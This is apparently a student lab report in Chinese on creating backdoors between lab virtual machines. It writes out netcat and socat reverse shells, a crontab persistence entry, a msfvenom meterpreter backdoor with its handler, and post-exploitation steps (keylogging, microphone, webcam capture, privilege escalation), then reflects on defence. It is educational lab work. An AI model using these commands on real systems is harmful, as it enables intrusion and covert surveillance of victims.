使用 ipconfig 查看win7虛擬機IP地址爲:192.168.236.130linux
使用 ipconfig 查看linux虛擬機IP地址爲:192.168.236.131web
進入文件夾shell
cd netcat
開始監聽windows
ncat.exe -l -p 4309
這裏的 -l 是監聽模式,-p是選擇監聽的端口。安全
nc 192.168.236.130 4309 -e /bin/sh
nc -l -p 4309
ncat.exe -e cmd.exe 192.168.236.131 4309
能夠發現,linux端得到了win的shelltcp
ncat.exe -l -p 4309
nc 192.168.236.130 4309
ncat.exe -l -p 4309
crontab-e
crontab
指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab
文件中,以供以後讀取和執行,"-e"表示編輯工具
在最後添加一條定時鏈接win端口的指令學習
56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh
表示每小時的第56分鐘鏈接IP爲192.168.236.130的主機(即虛擬機win7端)的4309端口,具體時間能夠自行設定,我這裏爲了方便選擇了兩分鐘以後的時間網站
稍等片刻,發現成功獲取win端的shellui
tcp-listen:4309 exec:cmd.exe,pty,stderr
這個命令能夠將cmd.exe綁定到4309端口,而且將cmd.exe的stderr重定向到stdout上
咱們能夠看到,建立任務成功
使用Windows+l鎖定主機後,再解鎖,發現程序已經運行
socat - tcp:192.168.236.130:4309
這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的4309端口。
在實現的時候我出現了一個問題:在tcp後多打了一個空格,卡了好久,不過好在成功了,你們引覺得戒。
修改後發現已經成功獲取cmd Shell:
在linux端使用msfvenom工具,生成後門:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131
其中-p 使用的payload,爲有效載荷,就是被運輸有東西。這裏windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反彈回連的IP,即攻擊機linux的IP地址,LPORT是回連的端口,-f是生成文件的類型, >輸出到哪一個文件
因爲一開始沒有充分理解這裏的ip地址的意義,我使用了被攻擊win端的地址,致使在以後使用後門的時候屢屢失敗。通過理解我發現這裏的ip是被攻擊主機須要鏈接的地址,即爲攻擊機linux端的地址。
須要在win端關閉殺軟和防火牆的條件下進行
ncat.exe -lv 4309 > 20164309_backdoor.exe
其中-lv表示能夠觀察到鏈接狀態
nc 192.168.236.130 4309 < 20164309_backdoor.exe發送文件
在win端命令行顯示傳輸成功
的確傳輸成功了
輸入
msfconsole
進入控制檯(以後因爲實驗多次失敗我進入了這個界面不知道多少次。。。幸好這裏有一個小彩蛋,每次進入的界面大都和以前不同,也算是苦中做樂了吧)
use exploit/multi/handler
設置payload
set payload windows/meterpreter/reverse_tcp
使用生成後門程序時相同的payload
set LHOST 192.168.236.131
這裏須要與生成後門程序的主機IP相同
set LPORT 4309
須要使用相同的端口
show options
顯示選項
exploit
進行監聽
多次嘗試,在糾正了剛剛說的那個錯誤後在win端運行了正確的後門
發現能夠調用win端shell
還有不少功能可使用,咱們一個一個試試吧
screenshot
進行截屏,截屏得文件nQebvnBz.jpeg
keyscan_start
指令開始記錄下擊鍵的過程,亂輸一通試試:成功記錄
record_mic
指令截獲一段音頻,文件名爲qbucCKSm.wav發現沒法進行拍照,看看排除一下緣由,發現:
貌似虛擬機沒法調用內置攝像頭
上網查查有什麼解決的方法
???如今去買一個外置攝像頭也來不及了,忍痛割愛在本身主機上試試吧。。。
循序漸進地進行試驗:
查得ip地址爲:192.168.6.194
傳輸後門
在linux準備就緒後運行後門
發現能夠拍照了,那多拍幾張選一張看得出生理特徵的(好比眼鏡(???)),就決定是你了:hAcbeMwj,jpeg
輸入getuid查看權限分組
輸入getsystem進行提權
發如今提權時遇到了一些問題,沒法提權
有多是win10帳號是管理員權限?那我再在win7虛擬機上嘗試一下普通用戶
仍是失敗
再試試win7的管理員帳號
意想不到的是居然成功了,但願大神們能幫忙解釋一下原理
記得好久之前的三一五晚會曝光了一些手機APP擅自添加後門,致使巨大的財產損失的案例,那時候智能手機方興未艾,人們的安全意識也相對薄弱,可是如今這樣的事情還真實地發生在咱們身邊;還有一些釣魚網站會誘導咱們點擊下載一些後門程序,一旦程序運行就成了人爲刀俎我爲魚肉的情形了。
後門可能會假裝成正常的程序或軟件,誘導用戶使用,來獲取你的權限。
遠程拍照功能。在以前bm管理概論的課程中我閱讀了《無處可藏》這本書,有一段令我印象深入的細節是斯諾登筆記本電腦的攝像頭用膠帶封住了,當時我還認爲杞人憂天了,可是沒有想到這種技術門檻這麼低。
對於咱們來講最好的辦法就是常常性的殺毒、及時更新系統、病毒庫以查找後門。在實驗中我還發如今進行遠程照相的時候我攝像頭旁邊的呼吸燈閃了一下,若是現實生活中遇到這種狀況務必要注意了
此次實驗最大的收穫就是明白了細節決定成敗。因爲本身的粗心馬虎,此次實驗幾乎花了我兩個晚上才完成,每一步都要遇到一些或多或少地小問題。甚至一開始爲了避免註冊碼雲帳號沒有使用老師的ncet而去網上下載了一個,致使在傳輸文件的時候出現問題;還有輸入socat命令的時候多打了一個空格,也致使沒法順利調用shell;甚至在寫實驗報告的時候發現缺乏關鍵的截圖而回過頭來臨時作臨時截的。在從此的實驗和學習乃至工做中,我必定要戒驕戒躁,時刻關注細節,才能高質量地完成任務。